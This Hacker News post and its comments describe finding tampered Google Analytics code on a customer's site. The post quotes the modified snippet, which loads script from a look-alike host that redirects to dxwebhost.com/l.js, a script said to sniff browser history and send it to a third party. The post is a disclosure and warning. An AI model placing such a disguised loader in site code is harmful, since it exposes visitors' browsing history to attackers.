Modified Google Analytics XSS

19 points by holdenc ↗ HN
I found this on a customer site (for example) customersite.com. Looks like Google Analytics tracking code right?

<script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://customersite.com" : "http://www.customersite.com"); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); var test = unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"); </script> <script type="text/javascript"> try{ var pageTracker = _gat._getTracker("UA-xxxxxx-x"); pageTracker._trackPageview(); } catch(err) {}</script>

Somehow my customer had been tricked into changing: "https://" : "http://" to: "https://customersite.com" : "http://www.customersite.com"

This makes the JavaScript called from http://www.customersite.comgoogle-analytics.com which then redirects to dxwebhost.com/l.js for the JavaScript. It looks like JavaScript file then uses a CSS vulnerability to look-up the user's browser history, and asynchronously send it off to the third party site.

So if you happen to be looking at your network traffic and notice your browser history is being sent off to a strange site, check out the Google Analytics tracking code.

3 comments

[ 1.7 ms ] story [ 17.1 ms ] thread
Very clever, I wouldn't have noticed that just reading through the code. Whomever the thieves are, that mod was a nice hack.
What do you suppose people might do with this sort of data if they weren't in a legitimate position to monetize it (e.g. through an ad network)?

This code will sit there probing your cache over and over, it seems to just check a huge list of domains in order of Alexa rank.